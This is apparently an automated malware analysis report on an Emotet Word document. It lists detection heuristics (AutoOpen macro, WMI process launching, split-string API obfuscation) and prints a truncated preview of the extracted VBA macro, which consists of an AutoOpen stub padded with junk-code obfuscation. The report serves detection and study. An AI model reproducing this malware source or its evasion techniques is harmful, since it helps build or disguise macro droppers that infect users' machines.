Verdict: MALICIOUS
Risk Score: 302

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains VBA macros with an autoopen subroutine, a common technique for Emotet. The heuristics indicate the use of WMI to launch processes, and obfuscation of the 'winmgmts' API call. ClamAV also detected this as Emotet. The VBA script likely downloads and executes a second-stage payload.
Heuristics (8):
- ClamAV: Doc.Downloader.Emotet-6939138-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6939138-0
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical, OLE_VBA_WMI_PROCESS_CREATE]: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals [critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION]: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32840 bytes |

SHA-256: 63637580c591fbf3983a893cfad6a037ab96140037628a745251c20c8bd55b6a

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "uAAGUwX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "RADCD4A_"
Attribute VB_Base = "0{D882166F-D9BA-4DA8-A84C-46E4CD8C9E64}{D78CF6FB-B862-4FE9-BC03-E8E9474AC445}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "iDAACAQ"
Attribute VB_Base = "0{3C725D5C-D8B5-4332-95F7-FEF939F287E4}{2A70ED24-8C1B-4F30-9669-AEE71DDE4106}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "tADZAQ"
Sub autoopen()
If pQ1Gc1 = LUA_B4 Then
Nx4C_A = zcQGG1 - LAoAAA4o
Select Case HGCAc_x
Case 6750152
k1QAUc = CVar(723354492 * Rnd(QQAkZAU * Round(721449592) / 21190537 * CLng(787349579 * Sqr(lco4ADo))))
iGAAwC = Round(j1UAAGDw)
Case 564998708
iQcwUACA = d4BcAAo
PAxoUZkQ = Atn(396033936)
End Select
End If
If qQ4AAD = OG4UAAc Then
SxQCDD = UwoDxA - pAoAQDA
Select Case GDDkA1BA
Case 79816822
qA_UBQ = CVar(247330336 * Rnd(EAAAAQAD * Round(970842398) / 283880087 * CLng(291116281 * Sqr(NAUGCw))))
KA1AG_ = Round(OxADA4)
Case 850775130
KAUQAA = lDXcXA
toAkZwAX = Atn(908675351)
End Select
End If
If rAAoCAQ = UBA_AZc Then
VAUBAAAD = wQAoAQ1A - NoAUcwAB
Select Case oGCUXC
Case 250119717
AB4DDDAw = CVar(669048930 * Rnd(sAZBAQAc * Round(859089900) / 95451493 * CLng(640768456 * Sqr(UAA4AUZ))))
JZAAQA = Round(z4UkwA)
Case 193505518
hxAkoDBA = qXQCUA
zZDxAG = Atn(662985249)
End Select
End If
lGxxAQD4
If uUGAQXo = XAAUZQc Then
QAAAQ_oA = dAXBAA - r1A_AQGA
Select Case jDDADA
Case 430136169
zAwBAA = CVar(546088376 * Rnd(M4xo4oA * Round(58583347) / 540175413 * CLng(826070518 * Sqr(LADABxw))))
ckcZA1AA = Round(SUwX_kAQ)
Case 225601070
F44AQA = jQAAAU
VGBQ4Q = Atn(151232539)
End Select
End If
If vQUXD1B = OkDQBo Then
lA_AA_U = fUAXUA - BAZDco1
Select Case SBXAoUAo
Case 707526549
UoAUA1GA = CVar(555910028 * Rnd(EcwBCAx * Round(754689725) / 530215988 * CLng(159072776 * Sqr(GADwAx))))
zoAAAo = Round(iwoAcQ_X)
Case 577417582
uoC4QZU = ODCUxBB
EGDD1DA = Atn(290834139)
End Select
End If
End Sub
Attribute VB_Name = "jAAG4AU"
Function lGxxAQD4()
On Error Resume Next
If RUAAcGDA = oAXACAD Then
FQ__AAxQ = SCUXABA - EACZ_DU
Select Case GoDAAZ
Case 136352051
wGACAAA1 = CVar(373748631 * Rnd(zAQXxAZA * Round(270932904) / 973182514 * CLng(382208053 * Sqr(wUG1Qw))))
ECZoAk = Round(fXUAAk)
Case 803678515
p4ccAABA = mA4AAB
TxA4xZAG = Atn(793773556)
End Select
End If
If YQAADZw = SDkBUU Then
BQCwQGQ = N_AoAc - aUQUAQU
Select Case UABAGAA
Case 814140208
wAAkZZww = CVar(766661784 * Rnd(wD_Xwx * Round(89245718) / 619440220 * CLng(291268394 * Sqr(BkAkwDB))))
DUAGAB = Round(MQQAUX)
Case 458320918
t_AAXA = QABU1kG
HAkQAAA = Atn(59928413)
End Select
End If
If bUQAco = mACAAU Then
FkQUAXA4 = R1G1BQ - uZUcoD__
Select Case mAx_DAk
Case 969146695
EDBCAUQw = CVar(381963367 * Rnd(UXAAAA * Round(115459939) / 237303284 * CLng(419933571 * Sqr(P1BGwBX))))
tAQGBA = Round(IAADAwAA)
Case 711255456
... (truncated)